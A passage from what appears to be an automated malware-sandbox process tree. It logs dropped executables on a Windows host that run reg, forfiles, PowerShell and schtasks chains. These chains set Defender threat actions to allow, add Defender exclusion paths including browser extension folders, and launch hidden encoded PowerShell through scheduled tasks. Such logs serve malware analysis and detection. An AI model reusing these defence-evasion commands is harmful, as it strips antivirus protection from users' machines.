                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                              PID:2004
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                                              1⤵
                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              PID:2904
                                                                                                                                                            • C:\ProgramData\taskmgr.exe
                                                                                                                                                              C:\ProgramData\taskmgr.exe
                                                                                                                                                              1⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:1584
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                                              1⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:4584
                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                              1⤵
                                                                                                                                                                PID:6072
                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2440
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSF3C1.tmp\Install.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zSF3C1.tmp\Install.exe it /lAwdideDrP 385118 /S
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:5424
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:4940
                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:1824
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:4804
                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:5480
                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:3952
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:5284
                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:3968
                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:1520
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:5648
                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:1044
                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4496
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:5352
                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:1620
                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:4568
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:4476
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          PID:4432
                                                                                                                                                                                                          • C:\Windows\SysWOW64\wermgr.exe
                                                                                                                                                                                                            "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4432" "2012" "1892" "2016" "0" "0" "2020" "0" "0" "0" "0" "0"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:5272
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:1048
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:3096
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "gJPKYBqAs" /SC once /ST 00:40:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:3428
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /run /I /tn "gJPKYBqAs"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:2036
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /DELETE /F /TN "gJPKYBqAs"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:6136
                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                              schtasks /CREATE /TN "gnBpSuxqy" /SC once /ST 02:45:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                              PID:1284
                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                              schtasks /run /I /tn "gnBpSuxqy"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:2124
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSF3C1.tmp\Install.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7zSF3C1.tmp\Install.exe it /lAwdideDrP 385118 /S
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:5236
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:780
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:4044
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:808
                                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:6044
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:6040
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:6064
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:1280
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:2672
                                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                          PID:4056
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:5752
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:5684
                                                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:2096
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:6008
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:5280
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                    PID:4048
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t 